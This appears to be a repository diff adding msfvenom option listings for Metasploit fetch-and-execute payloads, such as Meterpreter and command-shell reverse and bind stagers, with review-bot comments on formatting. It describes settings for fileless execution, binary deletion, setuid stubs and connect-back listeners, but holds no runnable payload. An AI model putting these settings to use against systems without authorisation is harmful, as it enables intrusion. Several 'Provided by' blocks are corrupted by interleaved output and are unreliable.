no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload 
UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..fe3deca --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_tcp.txt 
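Review bot: the HttpUnknownRequestResponse row at the top of this file is broken across lines, so the Description column for it starts on its own line as "no The returned HTML response body ..." and the Name/Current Setting/Required columns for that option no longer line up with the rest of the advanced-options table. The default value of that option is a multi-line HTML body, and the generator is writing it verbatim into the fixed-width table; collapse it to a single line (or replace it with a short placeholder such as "<html body>") before emitting the row so the table stays parseable. The same breakage appears in the mips64 meterpreter_reverse_http and meterpreter_reverse_https files further down in this patch, where "It works!" ends up as a separate line in the middle of the table.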
@@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/armle/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME eOJorghpY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armle-shell-bind_tcp.txt new file mode 100644 index 0000000..2a8cfa6 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-http-armle-shell-bind_tcp.txt 
@@ -0,0 +1,85 @@ + + Name: HTTP Fetch, Linux dup2 Command Shell, Bind TCP Stager + Module: payload/cmd/linux/http/armle/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + nemo + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME DNCjskbcX no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + dup2 socket in r12, then execve. + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid 
false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armle-shell-reverse_tcp.txt new file mode 100644 index 0000000..d54ee5a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-shell-reverse_tcp.txt 
@@ -0,0 +1,93 @@ + + Name: HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/http/armle/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + nemo + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME GqKkLiLQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + dup2 socket in r12, then execve. + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid 
false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armle-shell_bind_tcp.txt new file mode 100644 index 0000000..9078462 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-shell_bind_tcp.txt 
@@ -0,0 +1,76 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/http/armle/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + civ + hal + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ARGV0 sh no argv[0] to pass to execve +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME spYHQrQwU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + Connect to target and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armle-shell_reverse_tcp.txt new file mode 100644 index 0000000..fcf684a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-shell_reverse_tcp.txt 
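Review bot: the Name line in this file reads "HTTP Fetch, Linux Command Shell, Reverse TCP Inline" while the Module is payload/cmd/linux/http/armle/shell_bind_tcp, the option table carries RHOST and requires FETCH_SRVHOST, and the Description says "Connect to target and spawn a command shell", i.e. this is a bind payload, not a reverse one. The dump is faithful to what the module reports, so nothing should be edited in this file, but the mismatch is worth flagging upstream (the identical Name string is used for the shell_reverse_tcp module that follows) and anyone consuming these files should key on the Module line rather than the Name line.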
@@ -0,0 +1,82 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/http/armle/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + civ + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ARGV0 sh no argv[0] to pass to execve +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME EzSqYGrB no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..ecbb6e4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_http.txt 
@@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mips64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/mips64/meterpreter_reverse_http: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME jkofOBXy no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a MIPS64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the 
payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..9a188e5 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_https.txt 
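Review bot: the "Provided by:" block in this file is corrupted: instead of an author list it contains an "Evasion options for payload/cmd/linux/http/mips64/meterpreter_reverse_http:" heading with its "=========================" underline, followed by a dangling fragment "ok@rapid7.com>" and then "timwr". That looks like two output streams (the module info and the evasion-options listing) being interleaved while the file was captured, which also truncated one author entry to the tail of an e-mail address. Compare the armle files earlier in this patch, where the same section lists the full names cleanly. Regenerate this file with the two outputs captured separately (or with stderr redirected away from the capture), and check the meterpreter_reverse_https file that follows, whose "Provided by:" block shows the same pattern ("B", the evasion-options heading, "@rapid7.com>").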
@@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mips64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/http/mips64/meterpreter_reverse_https: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME nqGcBdJTD no Name to use on remote system 